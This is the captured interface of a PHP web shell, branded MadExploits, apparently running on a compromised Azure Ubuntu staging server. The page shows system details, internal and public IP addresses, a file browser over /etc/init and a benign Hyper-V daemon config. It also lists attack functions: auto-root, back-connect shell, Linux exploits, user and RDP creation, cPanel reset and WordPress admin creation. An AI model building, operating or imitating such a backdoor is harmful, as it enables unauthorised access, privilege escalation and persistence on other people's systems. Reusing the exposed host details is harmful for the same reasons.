Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 3.144.104.123
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
init /
[ HOME SHELL ]
Name
Size
Permission
Action
ephemeral-disk-warning.conf
1.87
KB
-rw-r--r--
hv-fcopy-daemon.conf
674
B
-rw-r--r--
hv-kvp-daemon.conf
662
B
-rw-r--r--
hv-vss-daemon.conf
665
B
-rw-r--r--
mysql.conf
1.72
KB
-rw-r--r--
walinuxagent.conf
481
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hv-fcopy-daemon.conf
# On Azure/Hyper-V systems start the hv_fcopy_daemon # description "Hyper-V File Copy Protocol Daemon" author "Andy Whitcroft <apw@canonical.com>" start on runlevel [2345] stop on runlevel [!2345] console log pre-start script if [ -e "/etc/default/hv-kvp-daemon-init" ]; then . /etc/default/hv-kvp-daemon-init fi [ "$RUN_FCOPY_DAEMON" -eq 0 ] && { stop; exit 0; } if [ -d /sys/class/dmi/id/. ]; then read company </sys/class/dmi/id/sys_vendor read product </sys/class/dmi/id/product_name [ "$company:$product" = 'Microsoft Corporation:Virtual Machine' ] || { stop; exit 0; } fi end script exec /usr/sbin/hv_fcopy_daemon -n
Close